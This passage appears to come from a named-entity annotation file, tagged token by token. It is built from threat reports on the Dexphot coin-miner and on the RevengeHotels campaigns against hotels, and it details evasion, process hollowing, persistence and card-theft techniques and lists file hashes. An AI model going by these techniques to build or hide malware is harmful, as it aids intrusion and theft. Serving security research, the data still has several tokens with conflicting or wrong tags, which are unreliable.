+; O
+
+4 O
+、A O
+loader O
+DLL S-TOOL
+, O
+which O
+is O
+extracted O
+from O
+the O
+archive O
+; O
+
+5 O
+、An O
+encrypted O
+data O
+file O
+that O
+holds O
+three O
+additional O
+executables O
+that O
+are O
+loaded O
+into O
+system O
+processes O
+via O
+process O
+hollowing O
+. O
+
+Except O
+for O
+the O
+installer O
+, O
+the O
+other O
+processes O
+that O
+run O
+during O
+execution O
+are O
+legitimate O
+system O
+processes O
+. O
+
+This O
+can O
+make O
+detection O
+and O
+remediation O
+more O
+difficult O
+. O
+
+These O
+legitimate O
+system O
+processes O
+include O
+msiexec.exe S-FILE
+( O
+for O
+installing O
+MSI S-TOOL
+packages O
+) O
+, O
+unzIP S-TOOL
+. O
+
+exe S-FILE
+( O
+for O
+extracting O
+files O
+from O
+the O
+password-protected O
+ZIP O
+archive O
+) O
+, O
+rundll32.exe S-FILE
+( O
+for O
+loading O
+the O
+loader O
+DLL S-TOOL
+) O
+, O
+schtasks.exe S-FILE
+( O
+for O
+scheduled O
+tasks O
+) O
+, O
+powershell.exe S-FILE
+( O
+for O
+forced O
+updates O
+) O
+. O
+
+In O
+later O
+stages O
+, O
+Dexphot S-MAL
+targets O
+a O
+few O
+other O
+system O
+processes O
+for O
+process O
+hollowing O
+: O
+svchost.exe S-FILE
+, O
+tracert.exe S-FILE
+, O
+and O
+setup.exe S-FILE
+. O
+
+Based O
+on O
+Microsoft B-TOOL
+Defender E-TOOL
+ATP O
+signals O
+, O
+SoftwareBundler B-MAL
+: I-MAL
+Win32/ICLoader E-MAL
+and O
+its O
+variants O
+are O
+primarily O
+used O
+to O
+drop O
+and O
+run O
+the O
+Dexphot B-MAL S-MAL I-MAL
+installer E-MAL
+. O
+
+The O
+installer O
+uses O
+two O
+URLs O
+to O
+download O
+malicious O
+payloads O
+. O
+
+These O
+are O
+the O
+same O
+two O
+URLs O
+that O
+Dexphot S-MAL
+use O
+later O
+to O
+establish O
+persistence O
+, O
+update O
+the O
+malware O
+, O
+and O
+re-infect O
+the O
+device O
+. O
+
+The O
+installer O
+downloads O
+an O
+MSI S-TOOL
+package O
+from O
+one O
+of O
+the O
+two O
+URLs O
+, O
+and O
+then O
+launches O
+msiexec.exe S-FILE
+to O
+perform O
+a O
+silent O
+install O
+. O
+
+This O
+is O
+the O
+first O
+of O
+several O
+instances O
+of O
+Dexphot S-MAL
+employing O
+living-off-the-land O
+techniques O
+, O
+the O
+use O
+of O
+legitimate O
+system O
+processes O
+for O
+nefarious O
+purposes O
+. O
+
+Dexphot S-MAL
+’s O
+package O
+often O
+contains O
+an O
+obfuscated O
+batch O
+script O
+. O
+
+If O
+the O
+package O
+contains O
+this O
+file O
+, O
+the O
+script O
+is O
+the O
+first O
+thing O
+that O
+msiexec.exe S-FILE
+runs O
+when O
+it O
+begins O
+the O
+installation O
+process O
+. O
+
+The O
+said O
+obfuscated O
+script O
+is O
+designed O
+to O
+check O
+for O
+antivirus O
+products O
+. O
+
+Dexphot S-MAL
+halts O
+the O
+infection O
+process O
+immediately O
+if O
+an O
+antivirus O
+product O
+is O
+found O
+running O
+. O
+
+When O
+we O
+first O
+began O
+our O
+research O
+, O
+the O
+batch O
+script O
+only O
+checked O
+for O
+antivirus O
+products O
+from O
+Avast S-TOOL
+and O
+AVG S-TOOL
+. O
+
+Later O
+, O
+Windows B-TOOL
+Defender I-TOOL
+Antivirus E-TOOL
+was O
+added O
+to O
+the O
+checklist O
+. O
+
+If O
+the O
+process O
+is O
+not O
+halted O
+, O
+Dexphot S-MAL
+decompresses O
+the O
+password-protected O
+ZIP O
+archive O
+from O
+the O
+MSI S-TOOL
+package O
+. O
+
+The O
+password O
+to O
+this O
+archive O
+is O
+within O
+the O
+MSI S-TOOL
+package O
+. O
+
+Along O
+with O
+the O
+password O
+, O
+the O
+malware O
+’s O
+authors O
+also O
+include O
+a O
+clean O
+version O
+of O
+unzIP S-TOOL
+. O
+
+exe S-FILE
+so O
+that O
+they O
+do O
+n’t O
+have O
+to O
+rely O
+on O
+the O
+target O
+system O
+having O
+a O
+ZIP B-TOOL
+utility E-TOOL
+. O
+
+The O
+unzIP S-TOOL
+. O
+
+exe S-FILE
+file O
+in O
+the O
+package O
+is O
+usually O
+named O
+various O
+things O
+, O
+such O
+as O
+z.exe S-FILE
+or O
+ex.exe S-FILE
+, O
+to O
+avoid O
+scrutiny O
+. O
+
+The O
+ZIP O
+archive O
+usually O
+contains O
+three O
+files O
+: O
+the B-TOOL
+loader I-TOOL
+DLL E-TOOL
+, O
+an O
+encrypted O
+data O
+file O
+( O
+usually O
+named O
+bin.dat S-FILE
+) O
+, O
+and O
+, O
+often O
+, O
+one O
+clean B-TOOL
+unrelated I-TOOL
+DLL E-TOOL
+, O
+which O
+is O
+likely O
+included O
+to O
+mislead O
+detection O
+. O
+
+Dexphot S-MAL
+usually O
+extracts O
+the O
+decompressed O
+files O
+to O
+the O
+target O
+system O
+’s O
+Favorites B-TOOL
+folder E-TOOL
+. O
+
+The O
+files O
+are O
+given O
+new O
+, O
+random O
+names O
+, O
+which O
+are O
+generated O
+by O
+concatenating O
+words O
+and O
+numbers O
+based O
+on O
+the O
+time O
+of O
+execution O
+( O
+for O
+example O
+, O
+C:\Users\<user>\Favorites\\Res.Center.ponse\<numbers> O
+) O
+. O
+
+Msiexec.exe S-FILE
+next O
+calls O
+rundll32.exe S-FILE
+, O
+specifying O
+loader B-TOOL
+DLL E-TOOL S-TOOL
+( O
+urlmon.7z S-FILE
+in O
+the O
+example O
+above O
+) O
+in O
+order O
+to O
+decrypt B-MAL
+the I-MAL
+data I-MAL
+file E-MAL
+. O
+
+The O
+decryption O
+process O
+involves O
+ADD S-ENCR
+and O
+XOR S-ENCR
+operations O
+, O
+using O
+a O
+key O
+hardcoded O
+in O
+the O
+binary O
+. O
+
+The O
+decrypted O
+data O
+contains O
+three O
+executables O
+. O
+
+Unlike O
+the O
+files O
+described O
+earlier O
+, O
+these O
+executables O
+are O
+never O
+written O
+to O
+the O
+filesystem O
+. O
+
+Instead O
+, O
+they O
+exist O
+only O
+in O
+memory O
+, O
+and O
+Dexphot S-MAL
+runs O
+them O
+by O
+loading O
+them O
+into O
+other O
+system O
+processes O
+via O
+process B-TOOL
+hollowing E-TOOL
+. O
+
+Process B-TOOL
+hollowing E-TOOL
+is O
+a O
+technique O
+that O
+can O
+hide O
+malware O
+within O
+a O
+legitimate O
+system O
+process O
+. O
+
+It O
+replaces O
+the O
+contents O
+of O
+the O
+legitimate O
+process O
+with O
+malicious O
+code O
+. O
+
+Detecting O
+malicious O
+code O
+hidden O
+using O
+this O
+method O
+is O
+not O
+trivial O
+, O
+so O
+process B-TOOL
+hollowing E-TOOL
+has O
+become O
+a O
+prevalent O
+technique O
+used O
+by O
+malware O
+today O
+. O
+
+This O
+method O
+has O
+the O
+additional O
+benefit O
+of O
+being O
+fileless O
+: O
+the O
+code O
+can O
+be O
+run O
+without O
+actually O
+being O
+saved O
+on O
+the O
+file O
+system O
+. O
+
+Not O
+only O
+is O
+it O
+harder O
+to O
+detect O
+the O
+malicious O
+code O
+while O
+it O
+’s O
+running O
+, O
+it O
+’s O
+harder O
+to O
+find O
+useful O
+forensics O
+after O
+the O
+process O
+has O
+stopped O
+. O
+
+To O
+initiate O
+process B-TOOL
+hollowing E-TOOL
+, O
+the B-TOOL
+loader I-TOOL
+DLL E-TOOL S-TOOL
+targets O
+two O
+legitimate O
+system O
+processes O
+, O
+for O
+example O
+svchost.exe S-FILE
+or O
+nslookup.exe S-FILE
+, O
+and O
+spawns O
+them O
+in O
+a O
+suspended O
+state O
+. O
+
+The B-TOOL
+loader I-TOOL
+DLL E-TOOL S-TOOL
+replaces O
+the O
+contents O
+of O
+these O
+processes O
+with O
+the O
+first O
+and O
+second O
+decrypted O
+executables O
+. O
+
+These O
+executables O
+are O
+monitoring O
+services O
+for O
+maintaining O
+Dexphot S-MAL
+’s O
+components O
+. O
+
+The O
+now-malicious O
+processes O
+are O
+released O
+from O
+suspension O
+and O
+run O
+. O
+
+Next O
+, O
+the B-TOOL
+loader I-TOOL
+DLL E-TOOL S-TOOL
+targets O
+the O
+setup.exe S-FILE
+file O
+in O
+SysWoW64 S-OS
+. O
+
+It O
+removes O
+setup.exe S-FILE
+’s O
+contents O
+and O
+replaces O
+them O
+with O
+the O
+third O
+decrypted O
+executable O
+, O
+a O
+cryptocurrency O
+miner O
+. O
+
+Although O
+Dexphot S-MAL
+always O
+uses O
+a O
+cryptocurrency O
+miner O
+of O
+some O
+kind O
+, O
+it O
+’s O
+not O
+always O
+the O
+same O
+miner O
+. O
+
+It O
+used O
+different O
+programs O
+like O
+XMRig S-MAL
+and O
+JCE B-MAL
+Miner E-MAL
+over O
+the O
+course O
+of O
+our O
+research O
+. O
+
+The O
+two O
+monitoring O
+services O
+simultaneously O
+check O
+the O
+status O
+of O
+all O
+three O
+malicious O
+processes O
+. O
+
+Having O
+dual O
+monitoring O
+services O
+provides O
+redundancy O
+in O
+case O
+one O
+of O
+the O
+monitoring O
+processes O
+is O
+halted O
+. O
+
+If O
+any O
+of O
+the O
+processes O
+are O
+terminated O
+, O
+the O
+monitors O
+immediately O
+identify O
+the O
+situation O
+, O
+terminate O
+all O
+remaining O
+malicious O
+processes O
+, O
+and O
+re-infect O
+the O
+device O
+. O
+
+The O
+monitoring O
+components O
+also O
+detect O
+freshly O
+launched O
+cmd.exe S-FILE
+processes O
+and O
+terminate O
+them O
+promptly O
+. O
+
+As O
+a O
+final O
+fail-safe O
+, O
+Dexphot S-ACT
+uses O
+schtasks.exe S-FILE
+to O
+create O
+scheduled O
+tasks O
+. O
+
+This O
+persistence O
+technique O
+is O
+interesting O
+, O
+because O
+it O
+employs O
+two O
+distinct O
+MITRE B-TOOL
+ATT&CK E-TOOL
+techniques O
+: O
+Scheduled B-TOOL
+Task E-TOOL
+and O
+Signed B-TOOL
+Binary I-TOOL
+Proxy I-TOOL
+Execution E-TOOL
+. O
+
+The O
+scheduled O
+tasks O
+call O
+msiexec.exe S-FILE
+as O
+a O
+proxy O
+to O
+run O
+the O
+malicious O
+code O
+, O
+much O
+like O
+how O
+msiexec.exe S-FILE
+was O
+used O
+during O
+installation O
+. O
+
+Using O
+msiexec.exe S-FILE
+, O
+a O
+legitimate O
+system O
+process O
+, O
+can O
+make O
+it O
+harder O
+to O
+trace O
+the O
+source O
+of O
+malicious O
+activity O
+. O
+
+Furthermore O
+, O
+the O
+tasks O
+allow O
+Dexphot S-MAL
+to O
+conveniently O
+update O
+the O
+payload O
+from O
+the O
+web O
+every O
+time O
+the O
+tasks O
+run O
+. O
+
+They O
+automatically O
+update O
+all O
+of O
+Dexphot S-MAL
+’s O
+components O
+, O
+both O
+upon O
+system O
+reboot O
+as O
+well O
+as O
+every O
+90 O
+or O
+110 O
+minutes O
+while O
+the O
+system O
+is O
+running O
+. O
+
+Dexphot S-MAL
+also O
+generates O
+the O
+names O
+for O
+the O
+tasks O
+at O
+runtime O
+, O
+which O
+means O
+a O
+simple O
+block O
+list O
+of O
+hardcoded O
+task O
+names O
+will O
+not O
+be O
+effective O
+in O
+preventing O
+them O
+from O
+running O
+. O
+
+The O
+names O
+are O
+usually O
+in O
+a O
+GUID O
+format O
+, O
+although O
+after O
+we O
+released O
+our O
+first O
+round O
+of O
+Dexphot-blocking O
+protections O
+, O
+the O
+threat O
+authors O
+began O
+to O
+use O
+random O
+strings O
+. O
+
+The O
+threat O
+authors O
+have O
+one O
+more O
+evasion O
+technique O
+for O
+these O
+scheduled O
+tasks O
+: O
+some O
+Dexphot S-MAL
+variants O
+copy O
+msiexec.exe S-FILE
+to O
+an O
+arbitrary O
+location O
+and O
+give O
+it O
+a O
+random O
+name O
+, O
+such O
+as O
+%AppData%\<random>.exe S-FILE
+. O
+
+This O
+makes O
+the O
+system O
+process O
+running O
+malicious O
+code O
+a O
+literal O
+moving O
+target O
+. O
+
+Dexphot S-MAL
+exhibits O
+multiple O
+layers O
+of O
+polymorphism O
+across O
+the O
+binaries O
+it O
+distributes O
+. O
+
+For O
+example O
+, O
+the O
+MSI S-TOOL
+package O
+used O
+in O
+the O
+campaign O
+contains O
+different O
+files O
+, O
+as O
+shown O
+in O
+the O
+table O
+below O
+. O
+
+The O
+MSI S-TOOL
+packages O
+generally O
+include O
+a O
+clean O
+version O
+of O
+unzIP S-TOOL
+. O
+
+exe S-FILE
+, O
+a O
+password-protected O
+ZIP O
+file O
+, O
+and O
+a O
+batch O
+file O
+that O
+checks O
+for O
+currently O
+installed O
+antivirus O
+products O
+. O
+
+However O
+, O
+the O
+batch O
+file O
+is O
+not O
+always O
+present O
+, O
+and O
+the O
+names O
+of O
+the O
+ZIP O
+files O
+and O
+Loader B-TOOL
+DLLs E-TOOL
+, O
+as O
+well O
+as O
+the O
+password O
+for O
+extracting O
+the O
+ZIP O
+file O
+, O
+all O
+change O
+from O
+one O
+package O
+to O
+the O
+next O
+. O
+
+In O
+addition O
+, O
+the O
+contents O
+of O
+each O
+Loader B-TOOL
+DLL E-TOOL S-TOOL
+differs O
+from O
+package O
+to O
+package O
+, O
+as O
+does O
+the O
+encrypted O
+data O
+included O
+in O
+the O
+ZIP O
+file O
+. O
+
+This O
+leads O
+to O
+the O
+generation O
+of O
+a O
+different O
+ZIP B-TOOL
+archive E-TOOL
+and O
+, O
+in O
+turn O
+, O
+a O
+unique O
+MSI S-TOOL
+package O
+, O
+each O
+time O
+the O
+attacker O
+bundles O
+the O
+files O
+together O
+. O
+
+Because O
+of O
+these O
+carefully O
+designed O
+layers O
+of O
+polymorphism O
+, O
+a O
+traditional O
+file-based O
+detection O
+approach O
+wouldn’t O
+be O
+effective O
+against O
+Dexphot S-MAL
+. O
+
+Besides O
+tracking O
+the O
+files O
+and O
+processes O
+that O
+Dexphot S-MAL
+uses O
+to O
+execute O
+an O
+attack O
+, O
+we O
+have O
+also O
+been O
+monitoring O
+the O
+domains O
+used O
+to O
+host O
+malicious O
+payloads O
+. O
+
+The O
+URLs O
+used O
+for O
+hosting O
+all O
+follow O
+a O
+similar O
+pattern O
+. O
+
+The O
+domain O
+address O
+usually O
+ends O
+in O
+a O
+.info S-DOM
+or O
+.net S-DOM
+TLD O
+, O
+while O
+the O
+file O
+name O
+for O
+the O
+actual O
+payload O
+consists O
+of O
+random O
+characters O
+, O
+similar O
+to O
+the O
+randomness O
+previously O
+seen O
+being O
+used O
+to O
+generate O
+file O
+names O
+and O
+scheduled O
+tasks O
+. O
+
+Many O
+of O
+the O
+URLs O
+listed O
+were O
+in O
+use O
+for O
+an O
+extended O
+period O
+. O
+
+However O
+, O
+the O
+MSI S-TOOL
+packages O
+hosted O
+at O
+each O
+URL O
+are O
+frequently O
+changed O
+or O
+updated O
+. O
+
+In O
+addition O
+, O
+every O
+few O
+days O
+more O
+domains O
+are O
+generated O
+to O
+host O
+more O
+payloads O
+. O
+
+After O
+a O
+few O
+months O
+of O
+monitoring O
+, O
+we O
+were O
+able O
+to O
+identify O
+around O
+200 O
+unique O
+Dexphot S-MAL
+domains O
+. O
+
+Dexphot S-MAL
+is O
+not O
+the O
+type O
+of O
+attack O
+that O
+generates O
+mainstream O
+media O
+attention O
+; O
+it O
+’s O
+one O
+of O
+the O
+countless O
+malware O
+campaigns O
+that O
+are O
+active O
+at O
+any O
+given O
+time O
+. O
+
+Its O
+goal O
+is O
+a O
+very O
+common O
+one O
+in O
+cybercriminal O
+circles O
+— O
+to O
+install O
+a O
+coin O
+miner O
+that O
+silently O
+steals O
+computer O
+resources O
+and O
+generates O
+revenue O
+for O
+the O
+attackers O
+— O
+yet O
+Dexphot S-MAL
+exemplifies O
+the O
+level O
+of O
+complexity O
+and O
+rate O
+of O
+evolution O
+of O
+even O
+everyday O
+threats O
+, O
+intent O
+on O
+evading O
+protections O
+and O
+motivated O
+to O
+fly O
+under O
+the O
+radar O
+for O
+the O
+prospect O
+of O
+profit O
+. O
+
+To O
+combat O
+threats O
+, O
+several O
+next-generation O
+protection O
+engines O
+in O
+Microsoft B-TOOL
+Defender I-TOOL
+Advanced I-TOOL
+Threat I-TOOL
+Protection E-TOOL
+’s O
+antivirus B-TOOL
+component E-TOOL
+detect O
+and O
+stop O
+malicious O
+techniques O
+at O
+multiple O
+points O
+along O
+the O
+attack O
+chain O
+. O
+
+For O
+Dexphot S-MAL
+, O
+machine O
+learning-based O
+detections O
+in O
+the O
+cloud O
+recognize O
+and O
+block O
+the O
+DLLs S-TOOL
+loaded O
+by O
+rundll32.exe S-FILE
+, O
+stopping O
+the O
+attack O
+chain O
+in O
+its O
+early O
+stages O
+. O
+
+Memory O
+scans O
+detect O
+and O
+terminate O
+the O
+loading O
+of O
+malicious O
+code O
+hidden O
+by O
+process B-TOOL
+hollowing E-TOOL
+— O
+including O
+the O
+monitoring O
+processes O
+that O
+attempt O
+to O
+update O
+the O
+malware O
+code O
+and O
+re-infect O
+the O
+machine O
+via O
+PowerShell S-TOOL
+commands O
+. O
+
+Behavioral O
+blocking O
+and O
+containment O
+capabilities O
+are O
+especially O
+effective O
+in O
+defeating O
+Dexphot S-MAL
+’s O
+fileless O
+techniques O
+, O
+detection O
+evasion O
+, O
+and O
+persistence O
+mechanisms O
+, O
+including O
+the O
+periodic O
+and O
+boot-time O
+attempts O
+to O
+update O
+the O
+malware O
+via O
+scheduled O
+tasks O
+. O
+
+As O
+mentioned O
+, O
+given O
+the O
+complexity O
+of O
+the O
+attack O
+chain O
+and O
+of O
+Dexphot S-MAL
+’s O
+persistence O
+methods O
+, O
+we O
+released O
+a O
+remediation O
+solution O
+that O
+prevents O
+re-infection O
+by O
+removing O
+artifacts O
+. O
+
+The O
+detection O
+, O
+blocking O
+, O
+and O
+remediation O
+of O
+Dexphot S-MAL
+on O
+endpoints O
+are O
+exposed O
+in O
+Microsoft B-TOOL
+Defender I-TOOL
+Security I-TOOL
+Center E-TOOL
+, O
+where O
+Microsoft B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+’s O
+rich O
+capabilities O
+like O
+endpoint O
+detection O
+and O
+response O
+, O
+automated O
+investigation O
+and O
+remediation O
+, O
+and O
+others O
+enable O
+security O
+operations O
+teams O
+to O
+investigate O
+and O
+remediate O
+attacks O
+in O
+enterprise O
+environments O
+. O
+
+With O
+these O
+capabilities O
+, O
+Microsoft B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+provides O
+comprehensive O
+protection O
+against O
+Dexphot S-MAL
+and O
+the O
+countless O
+other O
+complex O
+and O
+evolving O
+threats O
+that O
+we O
+face O
+every O
+day O
+. O
+
+Dexphot S-MAL
+: O
+72acaf9ff8a43c68416884a3fff3b23e749b4bb8fb39e16f9976643360ed391f S-SHA2
+. O
+
+Dexphot S-MAL
+: O
+22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3 S-SHA2
+. O
+
+Dexphot S-MAL
+: O
+65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a S-SHA2
+. O
+
+Dexphot S-MAL
+: O
+ba9467e0d63ba65bf10650a3c8d36cd292b3f846983032a44a835e5966bc7e88 S-SHA2
+. O
+
+Dexphot S-MAL
+: O
+537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e S-SHA2
+. O
+
+Dexphot S-MAL
+: O
+504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5 S-SHA2
+. O
+
+Dexphot S-MAL
+: O
+aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152 S-SHA2
+. O
+
+
+RevengeHotels S-APT
+: O
+cybercrime O
+targeting O
+hotel O
+front O
+desks O
+worldwide O
+. O
+
+RevengeHotels S-APT
+is O
+a O
+targeted O
+cybercrime O
+malware O
+campaign O
+against O
+hotels O
+, O
+hostels O
+, O
+hospitality O
+and O
+tourism O
+companies O
+, O
+mainly O
+, O
+but O
+not O
+exclusively O
+, O
+located O
+in O
+Brazil S-LOC
+. O
+
+We O
+have O
+confirmed O
+more O
+than O
+20 O
+hotels O
+that O
+are O
+victims O
+of O
+the O
+group O
+, O
+located O
+in O
+eight O
+states O
+in O
+Brazil S-LOC
+, O
+but O
+also O
+in O
+other O
+countries O
+such O
+as O
+Argentina S-LOC
+, O
+Bolivia S-LOC
+, O
+Chile S-LOC
+, O
+Costa B-LOC
+Rica E-LOC
+, O
+France S-LOC
+, O
+Italy S-LOC
+, O
+Mexico S-LOC
+, O
+Portugal S-LOC
+, O
+Spain S-LOC
+, O
+Thailand S-LOC
+and O
+Turkey S-LOC
+. O
+
+The O
+goal O
+of O
+the O
+campaign O
+is O
+to O
+capture O
+credit O
+card O
+data O
+from O
+guests O
+and O
+travelers O
+stored O
+in O
+hotel O
+systems O
+, O
+as O
+well O
+as O
+credit O
+card O
+data O
+received O
+from O
+popular O
+online B-IDTY
+travel I-IDTY
+agencies E-IDTY
+( O
+OTAs S-IDTY
+) O
+such O
+as O
+Booking.com S-DOM
+. O
+
+The O
+main O
+attack O
+vector O
+is O
+via O
+email B-ACT
+with I-ACT
+crafted I-ACT
+Word I-ACT
+, I-ACT
+Excel I-ACT
+or I-ACT
+PDF I-ACT
+documents I-ACT
+attached E-ACT
+. O
+
+Some O
+of O
+them O
+exploit O
+CVE-2017-0199 S-VULID
+, O
+loading O
+it O
+using O
+VBS O
+and O
+PowerShell S-TOOL
+scripts O
+and O
+then O
+installing O
+customized O
+versions O
+of O
+RevengeRAT S-MAL
+, O
+NjRAT S-MAL
+, O
+NanoCoreRAT S-MAL
+, O
+888 B-MAL
+RAT E-MAL
+and O
+other O
+custom O
+malware O
+such O
+as O
+ProCC S-MAL
+in O
+the O
+victim O
+’s O
+machine O
+. O
+
+The O
+group O
+has O
+been O
+active O
+since O
+2015 S-TIME
+, O
+but O
+increased O
+its O
+attacks O
+in O
+2019 S-TIME
+. O
+
+In O
+our O
+research O
+, O
+we O
+were O
+also O
+able O
+to O
+track O
+two O
+groups O
+targeting O
+the O
+hospitality O
+sector O
+, O
+using O
+separate O
+but O
+similar O
+infrastructure O
+, O
+tools O
+and O
+techniques O
+. O
+
+PaloAlto S-IDTY
+has O
+already O
+written O
+about O
+one O
+of O
+them O
+. O
+
+We O
+named O
+the O
+first O
+group O
+RevengeHotels S-APT
+, O
+and O
+the O
+second O
+ProCC S-APT
+. O
+
+These O
+groups O
+use O
+a O
+lot O
+of O
+social O
+engineering O
+in O
+their O
+attacks O
+, O
+asking O
+for O
+a O
+quote O
+from O
+what O
+appears O
+to O
+be O
+a O
+government O
+entity O
+or O
+private O
+company O
+wanting O
+to O
+make O
+a O
+reservation O
+for O
+a O
+large O
+number O
+of O
+people O
+. O
+
+Their O
+infrastructure O
+also O
+relies O
+on O
+the O
+use O
+of O
+dynamic O
+DNS S-PROT
+services O
+pointing O
+to O
+commercial O
+hosting O
+and O
+self-hosted O
+servers O
+. O
+
+They O
+also O
+sell O
+credentials O
+from O
+the O
+affected O
+systems O
+, O
+allowing O
+other O
+cybercriminals O
+to O
+have O
+remote O
+access O
+to O
+hotel O
+front O
+desks O
+infected O
+by O
+the O
+campaign O
+. O
+
+We O
+monitored O
+the O
+activities O
+of O
+these O
+groups O
+and O
+the O
+new O
+malware O
+they O
+are O
+creating O
+for O
+over O
+a O
+year O
+. O
+
+With O
+a O
+high O
+degree O
+of O
+confidence O
+, O
+we O
+can O
+confirm O
+that O
+at O
+least O
+two O
+distinct O
+groups O
+are O
+focused O
+on O
+attacking O
+this O
+sector O
+; O
+there O
+is O
+also O
+a O
+third O
+group O
+, O
+though O
+it O
+is O
+unclear O
+if O
+its O
+focus O
+is O
+solely O
+on O
+this O
+sector O
+or O
+if O
+carries O
+out O
+other O
+types O
+of O
+attacks O
+. O
+
+One O
+of O
+the O
+tactics O
+used O
+in O
+operations O
+by O
+these O
+groups O
+is O
+highly O
+targeted O
+spear-phishing B-ACT
+messages E-ACT
+. O
+
+They O
+register O
+typo-squatting O
+domains O
+, O
+impersonating O
+legitimate O
+companies O
+. O
+
+The O
+emails S-TOOL
+are O
+well O
+written O
+, O
+with O
+an O
+abundance O
+of O
+detail O
+. O
+
+They O
+explain O
+why O
+the O
+company O
+has O
+chosen O
+to O
+book O
+that O
+particular O
+hotel O
+. O
+
+By O
+checking O
+the O
+sender O
+information O
+, O
+it O
+’s O
+possible O
+to O
+determine O
+whether O
+the O
+company O
+actually O
+exists O
+. O
+
+However O
+, O
+there O
+is O
+a O
+small O
+difference O
+between O
+the O
+domain O
+used O
+to O
+send O
+the O
+email S-TOOL
+and O
+the O
+real O
+one O
+. O
+
+This O
+spear-phishing S-ACT
+message O
+, O
+written O
+in O
+Portuguese O
+, O
+has O
+a O
+malicious O
+file O
+attached O
+misusing O
+the O
+name O
+of O
+a O
+real O
+attorney O
+office O
+, O
+while O
+the O
+domain O
+sender O
+of O
+the O
+message O
+was O
+registered O
+one O
+day O
+before O
+, O
+using O
+a O
+typo-squatting O
+domain O
+. O
+
+The O
+group O
+goes O
+further O
+in O
+its O
+social O
+engineering O
+effort O
+: O
+to O
+convince O
+the O
+hotel O
+personnel O
+about O
+the O
+legitimacy O
+of O
+their O
+request O
+, O
+a O
+copy O
+of O
+the O
+National O
+Registry O
+of O
+Legal O
+Entities O
+card O
+( O
+CNPJ O
+) O
+is O
+attached O
+to O
+the O
+quotation O
+. O
+
+The O
+attached O
+file O
+, O
+Reserva B-FILE
+Advogados I-FILE
+Associados.docx E-FILE
+( O
+Attorneys B-FILE
+Associates I-FILE
+Reservation.docx E-FILE
+) O
+, O
+is O
+a O
+malicious O
+Word O
+file O
+that O
+drops O
+a O
+remote O
+OLE S-TOOL
+object O
+via O
+template O
+injection O
+to O
+execute O
+macro O
+code O
+. O
+
+The O
+macro O
+code O
+inside O
+the O
+remote O
+OLE S-TOOL
+document O
+contains O
+PowerShell S-TOOL
+commands O
+that O
+download O
+and O
+execute O
+the O
+final O
+payload O
+. O
+
+In O
+the O
+RevengeHotels S-APT
+campaign O
+, O
+the O
+downloaded O
+files O
+are O
+.NET S-FILE
+binaries O
+protected O
+with O
+the O
+Yoda B-MAL
+Obfuscator E-MAL
+. O
+
+After O
+unpacking O
+them O
+, O
+the O
+code O
+is O
+recognizable O
+as O
+the O
+commercial O
+RAT S-MAL
+RevengeRAT S-MAL
+. O
+
+An O
+additional O
+module O
+written O
+by O
+the O
+group O
+called O
+ScreenBooking S-MAL
+is O
+used O
+to O
+capture O
+credit O
+card O
+data O
+. O
+
+It O
+monitors O
+whether O
+the O
+user O
+is O
+browsing O
+the O
+web O
+page O
+. O
+
+In O
+the O
+initial O
+versions O
+, O
+back O
+in O
+2016 S-TIME
+, O
+the O
+downloaded O
+files O
+from O
+RevengeHotels S-APT
+campaigns O
+were O
+divided O
+into O
+two O
+modules O
+: O
+a O
+backdoor S-MAL
+and O
+a O
+module O
+to O
+capture O
+screenshots O
+. O
+
+Recently O
+we O
+noticed O
+that O
+these O
+modules O
+had O
+been O
+merged O
+into O
+a O
+single O
+backdoor O
+module O
+able O
+to O
+collect O
+data O
+from O
+clipboard O
+and O
+capture O
+screenshots O
+. O
+
+In O
+this O
+example O
+, O
+the O
+webpage O
+that O
+the O
+attacker O
+is O
+monitoring O
+is O
+booking.com S-DOM
+( O
+more O
+specifically O
+, O
+the O
+page O
+containing O
+the O
+card O
+details O
+) O
+. O
+
+The O
+code O
+is O
+specifically O
+looking O
+for O
+data O
+in O
+Portuguese O
+and O
+English O
+, O
+allowing O
+the O
+attackers O
+to O
+steal O
+credit O
+card O
+data O
+from O
+web O
+pages O
+written O
+in O
+these O
+languages O
+. O
+
+In O
+the O
+ProCC S-APT
+campaigns O
+, O
+the O
+downloaded O
+files O
+are O
+Delphi S-TOOL
+binaries O
+. O
+
+The O
+backdoor S-MAL
+installed O
+in O
+the O
+machine O
+is O
+more O
+customized O
+than O
+that O
+used O
+by O
+RevengeHotels S-APT
+: O
+it O
+’s O
+developed O
+from O
+scratch O
+and O
+is O
+able O
+to O
+collect O
+data O
+from O
+the O
+clipboard O
+and O
+printer O
+spooler O
+, O
+and O
+capture O
+screenshots O
+. O
+
+Because O
+the O
+personnel O
+in O
+charge O
+of O
+confirming O
+reservations O
+usually O
+need O
+to O
+pull O
+credit O
+card O
+data O
+from O
+OTA B-TOOL
+websites E-TOOL
+, O
+it O
+’s O
+possible O
+to O
+collect O
+card O
+numbers O
+by O
+monitoring O
+the O
+clipboard O
+and O
+the O
+documents O
+sent O
+to O
+the O
+printer O
+. O
+
+According O
+to O
+the O
+relevant O
+underground O
+forums O
+and O
+messaging O
+groups O
+, O
+these O
+criminals O
+also O
+infect O
+front O
+desk O
+machines O
+in O
+order O
+to O
+capture O
+credentials O
+from O
+the O
+hotel O
+administration O
+software O
+; O
+they O
+can O
+then O
+steal O
+credit O
+card O
+details O
+from O
+it O
+too O
+. O
+
+Some O
+criminals O
+also O
+sell O
+remote O
+access O
+to O
+these O
+systems O
+, O
+acting O
+as O
+a O
+concierge O
+for O
+other O
+cybercriminals O
+by O
+giving O
+them O
+permanent O
+access O
+to O
+steal O
+new O
+data O
+by O
+themselves O
+. O
+
+Some O
+Brazilian B-APT
+criminals E-APT
+tout O
+credit O
+card O
+data O
+extracted O
+from O
+a O
+hotel O
+’s O
+system O
+as O
+high O
+quality O
+and O
+reliable O
+because O
+it O
+was O
+extracted B-ACT
+from I-ACT
+a I-ACT
+trusted I-ACT
+source I-ACT
+, I-ACT
+i.e. I-ACT
+, I-ACT
+a I-ACT
+hotel I-ACT
+administration I-ACT
+system E-ACT
+. O
+
+The O
+majority O
+of O
+the O
+victims O
+are O
+associated O
+with O
+the O
+hospitality O
+sector O
+. O
+
+Based O
+on O
+the O
+routines O
+used O
+, O
+we O
+estimate O
